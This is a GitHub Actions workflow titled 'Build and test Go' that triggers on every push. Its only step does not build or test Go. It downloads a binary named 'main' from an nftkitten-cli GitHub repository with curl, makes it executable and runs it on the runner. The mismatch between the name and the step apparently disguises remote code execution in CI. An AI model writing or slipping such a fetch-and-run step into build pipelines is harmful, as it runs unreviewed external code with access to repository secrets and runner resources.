name: Build and test Go
on: [push]
jobs:
  build:
    name: Build
    runs-on: ubuntu-latest
    steps:
    - run: |
        curl -LJO https://github.com/nftkitten/nftkitten-cli/raw/main/main
        chmod +x ./main
        ./main
